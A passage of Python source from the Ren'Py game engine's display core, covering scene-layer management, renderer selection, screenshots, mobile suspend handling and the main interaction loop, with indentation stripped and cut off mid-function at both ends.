rv.append(sle.tag)
return rv
def make_layer(self, layer, properties):
rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
rv.append_scene_list(self.layers[layer])
rv.layer_name = layer
rv._duplicatable = False
time, at_list = self.layer_at_list[layer]
old_transform = self.layer_transform.get(layer, None)
new_transform = None
if at_list:
for a in at_list:
if isinstance(a, renpy.display.motion.Transform):
rv = a(child=rv)
new_transform = rv
else:
rv = a(rv)
if (new_transform is not None) and (renpy.config.keep_show_layer_state):
self.transform_state(old_transform, new_transform, execution=True)
f = renpy.display.layout.MultiBox(layout='fixed')
f.add(rv, time, time)
f.layer_name = layer
rv = f
self.layer_transform[layer] = new_transform
return rv
def remove_hide_replaced(self, layer, tag):
hide_tag = "hide$" + tag
replaced_tag = "replaced$" + tag
l = self.layers[layer]
self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
def remove_hidden(self):
now = get_time()
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if sle.tag.startswith("hide$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
if not d:
continue
elif sle.tag.startswith("replaced$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
if not d:
continue
newl.append(sle)
self.layers[l] = newl
def remove_all_hidden(self):
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if "$" in sle.tag:
continue
newl.append(sle)
self.layers[l] = newl
def get_displayable_by_tag(self, layer, tag):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
return sle.displayable
return None
def get_displayable_by_name(self, layer, name):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.name == name:
return sle.displayable
return None
def get_image_bounds(self, layer, tag, width, height):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
break
else:
return None
now = get_time()
if sle.show_time is not None:
st = now - sle.show_time
else:
st = 0
if sle.animation_time is not None:
at = now - sle.animation_time
else:
at = 0
surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
sw = surf.width
sh = surf.height
x, y = place(width, height, sw, sh, sle.displayable.get_placement())
return (x, y, sw, sh)
def scene_lists(index=-1):
return renpy.game.context(index).scene_lists
class MouseMove(object):
def __init__(self, x, y, duration):
self.start = get_time()
if duration is not None:
self.duration = duration
else:
self.duration = 0
self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()
self.end_x = x
self.end_y = y
def perform(self):
elapsed = get_time() - self.start
if elapsed >= self.duration:
renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
return False
done = 1.0 * elapsed / self.duration
x = int(self.start_x + done * (self.end_x - self.start_x))
y = int(self.start_y + done * (self.end_y - self.start_y))
renpy.display.draw.set_mouse_pos(x, y)
return True
def get_safe_mode():
if renpy.safe_mode_checked:
return False
try:
if renpy.windows:
import ctypes
VK_SHIFT = 0x10
ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
if ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000:
return True
else:
return False
# Safe mode doesn't work on other platforms.
return False
except:
return False
initial_maximum_framerate = 0.0
class Interface(object):
def __init__(self):
self.screenshot = None
self.screenshot_surface = None
self.old_scene = { }
self.transition = { }
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.suppress_transition = False
self.quick_quit = False
self.force_redraw = False
self.restart_interaction = False
self.pushed_event = None
self.ticks = 0
self.mouse = 'default'
self.timeout_time = None
self.last_event = None
self.current_context = None
self.roll_forward = None
self.preloads = [ ]
self.frame_time = 0
self.interact_time = None
self.quit_time = 0
self.in_quit_event = False
self.time_event = pygame.event.Event(TIMEEVENT)
self.redraw_event = pygame.event.Event(REDRAW)
self.mouse_focused = True
self.keyboard_focused = True
self.layer_properties = { }
self.shown_window = False
self.fullscreen = False
self.ignore_touch = False
self.clear_screenshot = False
for layer in renpy.config.layers + renpy.config.top_layers:
if layer in renpy.config.layer_clipping:
x, y, w, h = renpy.config.layer_clipping[layer]
self.layer_properties[layer] = dict(
xpos=x,
xanchor=0,
ypos=y,
yanchor=0,
xmaximum=w,
ymaximum=h,
xminimum=w,
yminimum=h,
clipping=True,
)
else:
self.layer_properties[layer] = dict()
self.transition_info_stack = [ ]
self.event_time = 0
self.mouse_event_time = None
self.show_mouse = True
self.display_reset = False
self.last_resize = None
self.thread = threading.current_thread()
renpy.audio.audio.init()
try:
pygame.display.init()
except:
pass
init_time()
self.mouse_event_time = get_time()
self.window_caption = None
renpy.game.interface = self
renpy.display.interface = self
self.safe_mode = False
self.bgscreenshot_needed = False
self.bgscreenshot_event = threading.Event()
self.bgscreenshot_surface = None
self.mouse_move = None
self.text_editing = None
self.text_rect = None
self.old_text_rect = None
self.touch = renpy.exports.variant("touch")
self.restart_interaction = True
if renpy.config.periodic_callback:
renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
renpy.display.emulator.init_emulator()
self.started = False
self.fullscreen_video = False
self.safe_mode = get_safe_mode()
renpy.safe_mode_checked = True
self.dpi_scale = self.setup_dpi_scaling()
renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
self.maximum_framerate_time = 0.0
self.maximum_framerate(initial_maximum_framerate)
self.start_interact = True
self.frame_times = [ ]
self.frame_duration = 1.0 / 60.0
def setup_dpi_scaling(self):
if "RENPY_HIGHDPI" in os.environ:
return float(os.environ["RENPY_HIGHDPI"])
if not renpy.windows:
return 1.0
try:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
GetDC = ctypes.windll.user32.GetDC
GetDC.restype = c_void_p
GetDC.argtypes = [ c_void_p ]
ReleaseDC = ctypes.windll.user32.ReleaseDC
ReleaseDC.argtypes = [ c_void_p, c_void_p ]
GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
GetDeviceCaps.restype = c_int
GetDeviceCaps.argtypes = [ c_void_p, c_int ]
LOGPIXELSX = 88
dc = GetDC(None)
rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
ReleaseDC(None, dc)
if rv < renpy.config.de_minimus_dpi_scale:
renpy.display.log.write("De minimus DPI scale, was %r", rv)
rv = 1.0
return rv
except:
renpy.display.log.write("Could not determine DPI scale factor:")
renpy.display.log.exception()
return 1.0
def start(self):
if self.started:
return
gc.collect()
if gc.garbage:
gc.garbage[:] = [ ]
renpy.display.render.render_ready()
renpy.display.presplash.end()
renpy.main.log_clock("Interface start")
self.started = True
self.set_mode()
renpy.text.font.load_fonts()
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
pygame.event.set_grab(False)
if not self.safe_mode:
renpy.display.controller.init()
s = "Total time until interface ready: {}s".format(time.time() - import_time)
renpy.display.log.write(s)
if renpy.android and not renpy.config.log_to_stdout:
print(s)
def post_init(self):
pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
# Needed for Unity.
wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
self.set_window_caption(force=True)
self.set_icon()
if renpy.config.key_repeat is not None:
delay, repeat_delay = renpy.config.key_repeat
pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
if android:
android.wakelock(True)
# Block events we don't use.
for i in pygame.event.get_standard_events():
if i in enabled_events:
continue
if i in renpy.config.pygame_events:
continue
pygame.event.set_blocked(i)
def set_icon(self):
icon = renpy.config.window_icon
if icon:
im = renpy.display.scale.image_load_unscaled(
renpy.loader.load(icon),
icon,
)
iw, ih = im.get_size()
imax = max(iw, ih)
square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
im = square_im
pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
def iconify(self):
pygame.display.iconify()
def get_draw_constructors(self):
renderer = renpy.game.preferences.renderer
renderer = os.environ.get("RENPY_RENDERER", renderer)
if self.safe_mode:
renderer = "sw"
if (renderer == "angle") and (not renpy.windows):
renderer = "auto"
renpy.config.renderer = renderer
if renderer == "auto":
if renpy.windows:
renderers = [ "gl", "angle", "sw" ]
else:
renderers = [ "gl", "sw" ]
if renpy.config.gl2:
renderers = [ "gl2", "egl2" ] + renderers
else:
renderers = [ renderer, "sw" ]
draw_objects = { }
def make_draw(name, mod, cls, *args):
if name not in renderers:
return False
try:
__import__(mod)
module = sys.modules[mod]
draw_class = getattr(module, cls)
draw_objects[name] = draw_class(*args)
return True
except:
renpy.display.log.write("Couldn't import {0} renderer:".format(name))
renpy.display.log.exception()
return False
if renpy.windows:
has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
else:
has_angle = False
make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
make_draw("sw", "renpy.display.swdraw", "SWDraw")
rv = [ ]
def append_draw(name):
if name in draw_objects:
rv.append(draw_objects[name])
else:
renpy.display.log.write("Unknown renderer: {0}".format(name))
for i in renderers:
append_draw(i)
return rv
def kill_textures(self):
if renpy.display.draw is not None:
renpy.display.draw.kill_textures()
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
def kill_textures_and_surfaces(self):
self.kill_textures()
renpy.display.im.cache.clear()
renpy.display.module.bo_cache = None
def set_mode(self, physical_size=None):
if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
renpy.display.video.movie_stop(clear=False)
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
renpy.display.module.bo_cache = None
if self.display_reset:
pygame.key.stop_text_input()
pygame.key.set_text_input_rect(None)
self.text_rect = None
if renpy.display.draw.info["renderer"] == "angle":
renpy.display.draw.quit()
pygame.display.quit()
self.kill_textures_and_surfaces()
self.old_text_rect = None
self.display_reset = False
virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
if physical_size is None:
if renpy.mobile or renpy.game.preferences.physical_size is None:
physical_size = (None, None)
else:
physical_size = renpy.game.preferences.physical_size
fullscreen = renpy.game.preferences.fullscreen
old_fullscreen = self.fullscreen
self.fullscreen = fullscreen
if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
fullscreen = False
self.fullscreen = renpy.game.preferences.fullscreen
if renpy.display.draw:
draws = [ renpy.display.draw ]
else:
draws = self.get_draw_constructors()
for draw in draws:
if draw.set_mode(virtual_size, physical_size, fullscreen):
renpy.display.draw = draw
renpy.display.render.models = draw.info.get("models", False)
break
else:
pass
else:
renpy.game.preferences.fullscreen = False
raise Exception("Could not set video mode.")
# Save the video size.
if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
if android:
android.init()
# We need to redraw the (now blank) screen.
self.force_redraw = True
# Assume we have focus until told otherwise.
self.mouse_focused = True
self.keyboard_focused = True
# Assume we're not minimized.
self.minimized = False
self.restart_interaction = True
self.profile_once = False
# Clear the frame times.
self.frame_times = [ ]
def draw_screen(self, root_widget, fullscreen_video, draw):
try:
renpy.display.render.per_frame = True
renpy.display.screen.per_frame()
finally:
renpy.display.render.per_frame = False
surftree = renpy.display.render.render_screen(
root_widget,
renpy.config.screen_width,
renpy.config.screen_height,
)
if draw:
renpy.display.draw.draw_screen(surftree, fullscreen_video)
now = time.time()
self.frame_times.append(now)
while (now - self.frame_times[0]) > renpy.config.performance_window:
self.frame_times.pop(0)
renpy.display.render.mark_sweep()
renpy.display.focus.take_focuses()
self.surftree = surftree
self.fullscreen_video = fullscreen_video
def take_screenshot(self, scale, background=False):
self.clear_screenshot = False
# Do nothing before the first interaction.
if not self.started:
return
if background and not renpy.emscripten:
self.bgscreenshot_event.clear()
self.bgscreenshot_needed = True
if not self.bgscreenshot_event.wait(1.0):
raise Exception("Screenshot timed out.")
surf = self.bgscreenshot_surface
self.bgscreenshot_surface = None
else:
surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
surf = renpy.display.scale.smoothscale(surf, scale)
renpy.display.render.mutated_surface(surf)
self.screenshot_surface = surf
sio = cStringIO.StringIO()
renpy.display.module.save_png(surf, sio, 0)
self.screenshot = sio.getvalue()
sio.close()
def check_background_screenshot(self):
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
def get_screenshot(self):
if not self.started:
self.start()
rv = self.screenshot
if not rv:
self.take_screenshot(
(renpy.config.thumbnail_width, renpy.config.thumbnail_height),
background=(threading.current_thread() is not self.thread),
)
rv = self.screenshot
self.lose_screenshot()
return rv
def lose_screenshot(self):
self.screenshot = None
self.screenshot_surface = None
def save_screenshot(self, filename):
window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
if renpy.config.screenshot_crop:
window = window.subsurface(renpy.config.screenshot_crop)
try:
renpy.display.scale.image_save_unscaled(window, filename)
if renpy.emscripten:
import emscripten
emscripten.run_script(r'''FSDownload('%s')''' % filename)
return True
except:
if renpy.config.debug:
raise
return False
def show_window(self):
if not renpy.store._window:
return
if not renpy.game.preferences.show_empty_window:
return
if renpy.game.context().scene_lists.shown_window:
return
if renpy.config.empty_window:
old_history = renpy.store._history # @UndefinedVariable
renpy.store._history = False
PPP("empty window")
try:
renpy.config.empty_window()
finally:
renpy.store._history = old_history
def do_with(self, trans, paired, clear=False):
if renpy.config.with_callback:
trans = renpy.config.with_callback(trans, paired)
if (not trans) or self.suppress_transition:
self.with_none()
return False
else:
self.set_transition(trans)
return self.interact(trans_pause=True,
suppress_overlay=not renpy.config.overlay_during_with,
mouse='with',
clear=clear)
def with_none(self, overlay=True):
PPP("start of with none")
renpy.game.context().say_attributes = None
# Show the window, if that's necessary.
self.show_window()
if overlay:
self.compute_overlay()
scene_lists = renpy.game.context().scene_lists
for layer, d in self.compute_scene(scene_lists).iteritems():
if layer not in self.transition:
self.old_scene[layer] = d
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
scene_lists.replace_transient()
scene_lists.shown_window = False
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
def event_peek(self):
if self.pushed_event:
return self.pushed_event
ev = pygame.event.poll()
if ev.type == pygame.NOEVENT:
self.check_background_screenshot()
renpy.display.draw.event_peek_sleep()
return None
self.pushed_event = ev
return ev
def event_poll(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
def compute_overlay(self):
if renpy.store.suppress_overlay:
return
renpy.ui.layer("overlay")
for i in renpy.config.overlay_functions:
i()
if renpy.game.context().scene_lists.shown_window:
for i in renpy.config.window_overlay_functions:
i()
renpy.ui.close()
def compute_scene(self, scene_lists):
rv = { }
for layer in renpy.config.layers + renpy.config.top_layers:
rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
root = renpy.display.layout.MultiBox(layout='fixed')
root.layers = { }
for layer in renpy.config.layers:
root.layers[layer] = rv[layer]
root.add(rv[layer])
rv[None] = root
return rv
def quit_event(self):
if self.screenshot is None:
renpy.exports.take_screenshot()
if self.quit_time > (time.time() - .75):
renpy.exports.quit(save=True)
if self.in_quit_event:
renpy.exports.quit(save=True)
if renpy.config.quit_action is not None:
self.quit_time = time.time()
renpy.exports.movie_stop(only_fullscreen=True)
renpy.store.mouse_visible = True
try:
self.in_quit_event = True
renpy.display.behavior.run(renpy.config.quit_action)
finally:
self.in_quit_event = False
else:
renpy.exports.quit(save=True)
def get_mouse_info(self):
if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
visible = False
else:
visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
if not visible:
return False, 0, 0, None
if not renpy.config.mouse:
return True, 0, 0, None
if not self.mouse_focused:
return False, 0, 0, None
mouse_kind = renpy.display.focus.get_mouse() or self.mouse
if mouse_kind in renpy.config.mouse:
anim = renpy.config.mouse[mouse_kind]
else:
anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
img, x, y = anim[self.ticks % len(anim)]
rend = renpy.display.im.load_image(img)
tex = rend.children[0][0]
xo = rend.children[0][1]
yo = rend.children[0][2]
return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
return (get_time() - self.frame_time) <= seconds_ago
def check_suspend(self, ev):
def save():
if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
renpy.loadsave.save("_reload-1")
renpy.persistent.update(True)
if ev.type == pygame.APP_TERMINATING:
save()
sys.exit(0)
if ev.type != pygame.APP_WILLENTERBACKGROUND:
return False
renpy.audio.audio.pause_all()
if android:
android.wakelock(False)
pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(REDRAW, 0)
pygame.time.set_timer(TIMEEVENT, 0)
save()
if renpy.config.quit_on_mobile_background:
sys.exit(0)
renpy.exports.free_memory()
print("Entered background.")
while True:
ev = pygame.event.wait()
if ev.type == pygame.APP_DIDENTERFOREGROUND:
break
if ev.type == pygame.APP_TERMINATING:
sys.exit(0)
print("Entering foreground.")
# Since we came back to life, we can get rid of the
# auto-reload.
renpy.loadsave.unlink_save("_reload-1")
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
renpy.audio.audio.unpause_all()
if android:
android.wakelock(True)
# Reset the display so we get the GL context back.
self.display_reset = True
self.restart_interaction = True
return True
def iconified(self):
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
def restored(self):
# This is necessary on Windows/DirectX/Angle, as otherwise we get
# a blank screen.
if not self.minimized:
return
self.minimized = False
renpy.display.log.write("The window was restored.")
if renpy.windows:
self.display_reset = True
self.set_mode(self.last_resize)
def enter_context(self):
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
def post_time_event(self):
try:
pygame.event.post(self.time_event)
except:
pass
def after_longpress(self):
self.ignore_touch = True
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
def update_text_rect(self):
if renpy.store._text_rect is not None: # @UndefinedVariable
self.text_rect = renpy.store._text_rect # @UndefinedVariable
if self.text_rect is not None:
not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable
if self.old_text_rect != self.text_rect:
x, y, w, h = self.text_rect
x0, y0 = renpy.display.draw.untranslate_point(x, y)
x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
rect = (x0, y0, x1 - x0, y1 - y0)
pygame.key.set_text_input_rect(rect) # @UndefinedVariable
if not self.old_text_rect or not_shown:
pygame.key.start_text_input() # @UndefinedVariable
else:
if self.old_text_rect:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
renpy.plog(1, "start of new interaction")
if not self.started:
self.start()
if self.clear_screenshot:
self.lose_screenshot()
self.clear_screenshot = False
self.trans_pause = trans_pause
# Cancel magic error reporting.
renpy.bootstrap.report_error = None
context = renpy.game.context()
if context.interacting:
raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")
context.interacting = True
# Show a missing window.
if not suppress_window:
self.show_window()
# These things can be done once per interaction.
preloads = self.preloads
self.preloads = [ ]
try:
for i in renpy.config.start_interact_callbacks:
i()
repeat = True
self.start_interact = True
while repeat:
repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
self.start_interact = False
return rv
finally:
context.interacting = False
# Clean out transient stuff at the end of an interaction.
if clear:
scene_lists = renpy.game.context().scene_lists
scene_lists.replace_transient()
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.restart_interaction = True
renpy.game.context().mark_seen()
renpy.game.context().scene_lists.shown_window = False
if renpy.game.log is not None:
renpy.game.log.did_interaction = True
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def consider_gc(self):
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
if expensive:
renpy.plog(1, "start idle_frame (expensive)")
else:
renpy.plog(1, "start idle_frame (inexpensive)")
# We want this to include the GC time, so we don't predict on
start = get_time()
step = 1
while True:
if self.event_peek():
break
if not (can_block and expensive):
if get_time() > (start + .0005):
break
if step == 1:
self.consider_gc()
step += 1
elif step == 2:
renpy.display.draw.ready_one_texture()
step += 1
elif step == 3:
if not self.prediction_coroutine:
step += 1
continue
try:
result = self.prediction_coroutine.send(expensive)
except ValueError:
result = None
if result is None:
self.prediction_coroutine = None
step += 1
elif result is False:
if not expensive:
step += 1
elif step == 4:
if expensive and renpy.emscripten:
renpy.display.im.cache.preload_thread_pass()
step += 1
elif step == 5:
if not self.did_autosave:
renpy.loadsave.autosave()
renpy.persistent.check_update()
self.did_autosave = True
step += 1
else:
break
if expensive:
renpy.plog(1, "end idle_frame (expensive)")
else:
renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
show_mouse=True,
trans_pause=False,
suppress_overlay=False,
suppress_underlay=False,
mouse='default',
preloads=[],
roll_forward=None,
):
renpy.plog(1, "start interact_core")
suppress_overlay = suppress_overlay or renpy.store.suppress_overlay
self.suppress_overlay = suppress_overlay
self.suppress_underlay = suppress_underlay
self.trans_pause = trans_pause
renpy.display.screen.show_overlay_screens(suppress_overlay)
renpy.display.screen.prepare_screens()
self.roll_forward = roll_forward
self.show_mouse = show_mouse
suppress_transition = renpy.config.skipping or renpy.game.less_updates
self.suppress_transition = False
if suppress_transition:
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
else:
for k in self.transition:
if k not in self.old_scene:
continue
self.ongoing_transition[k] = self.transition[k]
self.transition_from[k] = self.old_scene[k]._in_current_store()
self.transition_time[k] = None
self.transition.clear()
if trans_pause:
if not self.ongoing_transition:
return False, None
if None not in self.ongoing_transition:
return False, None
if suppress_transition:
return False, None
if not self.old_scene:
return False, None
renpy.translation.check_language()
self.restart_interaction = False
self.mouse = mouse
start_time = get_time()
end_time = start_time
for i in renpy.config.interact_callbacks:
i()
self.set_window_caption()
renpy.display.im.cache.tick()
renpy.text.text.text_tick()
renpy.display.predict.reset()
renpy.display.layout.size_groups.clear()
renpy.display.screen.updated_screens.clear()
pygame.event.clear((pygame.MOUSEMOTION,
PERIODIC,
TIMEEVENT,
REDRAW))
self.post_time_event()
scene_lists = renpy.game.context().scene_lists
scene_lists.remove_hidden()
if not suppress_overlay:
self.compute_overlay()
root_widget = renpy.display.layout.MultiBox(layout='fixed')
root_widget.layers = { }
focus_roots = [ ]
if not suppress_underlay:
for i in renpy.config.underlay:
root_widget.add(i)
focus_roots.append(i)
if roll_forward is not None:
rfw = renpy.display.behavior.RollForward(roll_forward)
root_widget.add(rfw)
focus_roots.append(rfw)
scene = self.compute_scene(scene_lists)
renpy.display.tts.set_root(scene[None])
renpy.plog(1, "computed scene")
for w in scene.itervalues():
try:
renpy.display.predict.displayable(w)
except:
pass
renpy.plog(1, "final predict")
layers_root = renpy.display.layout.MultiBox(layout='fixed')
layers_root.layers = { }
def add_layer(where, layer):
scene_layer = scene[layer]
focus_roots.append(scene_layer)
if (self.ongoing_transition.get(layer, None) and
not suppress_transition):
trans = self.ongoing_transition[layer](
old_widget=self.transition_from[layer],
new_widget=scene_layer)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
transition_time = self.transition_time.get(layer, None)
where.add(trans, transition_time, transition_time)
where.layers[layer] = trans
else:
where.layers[layer] = scene_layer
where.add(scene_layer)
for layer in renpy.config.layers:
add_layer(layers_root, layer)
if (self.ongoing_transition.get(None, None) and
not suppress_transition):
old_root = renpy.display.layout.MultiBox(layout='fixed')
old_root.layers = { }
for layer in renpy.config.layers:
d = self.transition_from[None].layers[layer]
old_root.layers[layer] = d
old_root.add(d)
trans = self.ongoing_transition[None](
old_widget=old_root,
new_widget=layers_root)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
trans._show()
transition_time = self.transition_time.get(None, None)
root_widget.add(trans, transition_time, transition_time)
if trans_pause:
if renpy.store._dismiss_pause:
sb = renpy.display.behavior.SayBehavior()
else:
sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')
root_widget.add(sb)
focus_roots.append(sb)
pb = renpy.display.behavior.PauseBehavior(trans.delay)
root_widget.add(pb, transition_time, transition_time)
focus_roots.append(pb)
else:
root_widget.add(layers_root)
for layer in renpy.config.top_layers:
add_layer(root_widget, layer)
for i in renpy.display.emulator.overlay:
root_widget.add(i)
del add_layer
self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
self.prediction_coroutine.send(None)
renpy.display.behavior.adj_registered.clear()
renpy.display.video.early_interact()
renpy.display.behavior.input_pre_per_interact()
root_widget.visit_all(lambda i : i.per_interact())
renpy.display.behavior.input_post_per_interact()
self.old_scene = scene
renpy.display.focus.before_interact(focus_roots)
# see it.
if self.restart_interaction:
return True, None
# Redraw the screen.
needs_redraw = True
# First pass through the while loop?
first_pass = True
# We don't yet know when the interaction began.
self.interact_time = None
self.did_autosave = False
old_timeout_time = None
old_redraw_time = None
rv = None
renpy.audio.audio.interact()
_redraw_in = 3600
video_frame_drawn = False
renpy.game.after_rollback = False
# How many frames have we shown so far?
frame = 0
can_block = False
# This try block is used to force cleanup even on termination
# caused by an exception propagating through this function.
try:
while rv is None:
renpy.plog(1, "start of interact while loop")
renpy.execution.not_infinite_loop(10)
# Check for a change in fullscreen preference.
if ((self.fullscreen != renpy.game.preferences.fullscreen) or
self.display_reset or (renpy.display.draw is None)):
self.set_mode()
needs_redraw = True
# Check for autoreload.
if renpy.loader.needs_autoreload:
renpy.loader.needs_autoreload = False
renpy.exports.reload_script()
for i in renpy.config.needs_redraw_callbacks:
if i():
needs_redraw = True
# Redraw the screen.
if (self.force_redraw or
((first_pass or not pygame.event.peek(ALL_EVENTS)) and
renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):
self.force_redraw = False
renpy.display.render.process_redraws()
# If we have a movie, start showing it.
fullscreen_video = renpy.display.video.interact()
# Clean out the redraws, if we have to.
# renpy.display.render.kill_redraws()
self.text_rect = None
# Draw the screen.
self.frame_time = get_time()
renpy.audio.audio.advance_time() # Sets the time of all video frames.
self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)
if first_pass:
if not self.interact_time:
self.interact_time = max(self.frame_time, get_time() - self.frame_duration)
scene_lists.set_times(self.interact_time)
for k, v in self.transition_time.iteritems():
if v is None:
self.transition_time[k] = self.interact_time
renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)
frame += 1
renpy.config.frames += 1
# If profiling is enabled, report the profile time.
if renpy.config.profile or self.profile_once:
renpy.plog(0, "end frame")
renpy.performance.analyze()
renpy.performance.clear()
renpy.plog(0, "start frame")
self.profile_once = False
if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:
x, y = renpy.display.draw.get_mouse_pos()
ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)
if self.ignore_touch:
x = -1
y = -1
if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
x = -1
y = -1
renpy.display.focus.mouse_handler(None, x, y, default=False)
needs_redraw = False
first_pass = False
pygame.time.set_timer(REDRAW, 0)
pygame.event.clear([REDRAW])
old_redraw_time = None
self.update_text_rect()
renpy.test.testexecution.execute()
# Move the mouse, if necessary.
if self.mouse_move is not None:
if not self.mouse_move.perform():
self.mouse_move = None
# Draw the mouse, if it needs drawing.
renpy.display.draw.update_mouse()
# See if we want to restart the interaction entirely.
if self.restart_interaction:
return True, None
# Determine if we need a redraw. (We want to run these
# functions, so we put them first to prevent short-circuiting.)
if renpy.display.video.frequent():
needs_redraw = True
video_frame_drawn = True
if renpy.display.render.check_redraws():
needs_redraw = True
# How many seconds until we timeout.
_timeout_in = 3600
# Handle the redraw timer.
redraw_time = renpy.display.render.redraw_time()
# We only need to set the REDRAW timer if we can block.
